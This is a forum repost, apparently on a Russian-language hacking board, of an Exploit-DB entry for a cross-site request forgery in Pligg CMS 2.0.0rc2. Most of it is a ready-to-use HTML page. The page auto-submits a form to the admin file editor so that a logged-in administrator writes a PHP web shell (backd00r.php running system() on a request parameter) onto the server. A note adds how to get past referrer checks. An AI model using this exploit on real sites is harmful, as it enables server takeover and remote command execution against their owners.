Exploit Pligg CMS 2.0.0rc2 - Cross-Site Request Forgery (File Creation)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
27600
Проверка EDB
  1. Пройдено
Автор
DAONE
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2013-08-15
Код:
---------------------------------------------------
# Exploit Title: Pligg CMS - CSRF Vulnerability
# Author: DaOne
# Vendor Homepage: http://pligg.com/
# Download link: https://github.com/Pligg/pligg-cms/archive/2.0.0rc2.zip
# Category: webapps/php
# Version: 2.0.0rc2 + old versions
---------------------------------------------------

-Create File by CSRF Exploit-
<html>
<body onload="document.form.submit();">
<form action="http://[target]/pligg/admin/admin_editor.php" method="post" name="form">
<input type="hidden" name="updatedfile" value="<?php system($_REQUEST['cmd']); ?>">
<input type="hidden" name="the_file2" value="/var/www/html/pligg/backd00r.php">
<input type="hidden" name="isempty" value="1">
<input type="hidden" name="save" value="Save+Changes">
</form>
</body>
</html>

# Exploit-DB Note:
# If getting a Wrong Referrer error, use Live HTTP Headers or Tamper Date plugin
# to mitigate the issue.
 
Источник
www.exploit-db.com

Похожие темы